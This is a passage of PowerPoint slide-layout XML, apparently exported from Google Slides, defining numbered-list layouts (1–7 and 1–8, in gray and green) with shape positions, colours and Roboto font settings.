                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="321" name="Google Shape;321;p33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>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2" name="Google Shape;322;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="4193263"/>
            <a:ext cx="75171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3" name="Google Shape;323;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="324" name="Google Shape;324;p33"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Thin"/>
                <a:ea typeface="Roboto Thin"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Google Shape;325;p33"/>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6" name="Google Shape;326;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1858813"/>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7" name="Google Shape;327;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12250" y="2439925"/>
            <a:ext cx="91440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8" name="Google Shape;328;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="30310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29" name="Google Shape;329;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="3622100"/>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0" name="Google Shape;330;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="4236125"/>
            <a:ext cx="9168600" cy="4464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21. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 331"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="11616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34" name="Google Shape;334;p3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35" name="Google Shape;335;p3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36" name="Google Shape;336;p3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37" name="Google Shape;337;p3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38" name="Google Shape;338;p3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339" name="Google Shape;339;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="340" name="Google Shape;340;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01</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Google Shape;341;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2" name="Google Shape;342;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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3" name="Google Shape;343;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="16842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4" name="Google Shape;344;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="345" name="Google Shape;345;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02</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="346" name="Google Shape;346;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 name="Google Shape;347;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125" y="16979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48" name="Google Shape;348;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="220740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34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="350" name="Google Shape;350;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03</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="351" name="Google Shape;351;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34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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3" name="Google Shape;353;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="27300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 name="Google Shape;354;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="355" name="Google Shape;355;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04</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="356" name="Google Shape;356;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7" name="Google Shape;357;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="27437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58" name="Google Shape;358;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="3252650"/>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9" name="Google Shape;359;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="360" name="Google Shape;360;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05</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="361" name="Google Shape;361;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2" name="Google Shape;362;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="3266350"/>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3" name="Google Shape;363;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="377527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4" name="Google Shape;364;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="365" name="Google Shape;365;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06</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="366" name="Google Shape;366;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7" name="Google Shape;367;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="378897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68" name="Google Shape;368;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="4323425"/>
            <a:ext cx="76401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9" name="Google Shape;369;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="370" name="Google Shape;370;p34"/>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600">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="371" name="Google Shape;371;p34"/>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2" name="Google Shape;372;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="4337125"/>
            <a:ext cx="8869800" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="146302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22. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 373"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p3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75" name="Google Shape;375;p3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376" name="Google Shape;376;p3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377" name="Google Shape;377;p3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378" name="Google Shape;378;p3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379" name="Google Shape;379;p3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0" name="Google Shape;380;p35"/>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1" name="Google Shape;381;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382" name="Google Shape;38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383" name="Google Shape;38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4" name="Google Shape;384;p35"/>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85" name="Google Shape;385;p35"/>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6" name="Google Shape;386;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="387" name="Google Shape;38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388" name="Google Shape;38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9" name="Google Shape;389;p35"/>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0" name="Google Shape;390;p35"/>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1" name="Google Shape;391;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="392" name="Google Shape;39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393" name="Google Shape;39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4" name="Google Shape;394;p35"/>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395" name="Google Shape;395;p35"/>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6" name="Google Shape;396;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="Google Shape;39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398" name="Google Shape;39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9" name="Google Shape;399;p35"/>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0" name="Google Shape;400;p35"/>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1" name="Google Shape;401;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="402" name="Google Shape;40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03" name="Google Shape;40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4" name="Google Shape;404;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="21353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05" name="Google Shape;405;p35"/>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06" name="Google Shape;406;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="407" name="Google Shape;40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08" name="Google Shape;40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9" name="Google Shape;409;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1225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0" name="Google Shape;410;p35"/>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35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="412" name="Google Shape;412;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13" name="Google Shape;413;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4" name="Google Shape;414;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="12590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15" name="Google Shape;415;p35"/>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6" name="Google Shape;416;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="417" name="Google Shape;417;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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18" name="Google Shape;418;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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9" name="Google Shape;419;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1697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23. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 420"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p3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2" name="Google Shape;422;p3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23" name="Google Shape;423;p3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24" name="Google Shape;424;p3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25" name="Google Shape;425;p3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26" name="Google Shape;426;p3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27" name="Google Shape;427;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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8" name="Google Shape;428;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="429" name="Google Shape;42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07</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="430" name="Google Shape;43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1" name="Google Shape;431;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="387312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2" name="Google Shape;432;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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3" name="Google Shape;433;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="434" name="Google Shape;43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08</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;43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6" name="Google Shape;436;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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37" name="Google Shape;437;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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8" name="Google Shape;438;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="439" name="Google Shape;43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05</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;44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1" name="Google Shape;441;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="299675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2" name="Google Shape;442;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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3" name="Google Shape;443;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Google Shape;44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06</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="445" name="Google Shape;44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6" name="Google Shape;446;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="3434875"/>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47" name="Google Shape;447;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="2135259"/>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8" name="Google Shape;448;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="449" name="Google Shape;449;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1D7E7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03</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="450" name="Google Shape;450;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1D7E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1" name="Google Shape;451;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
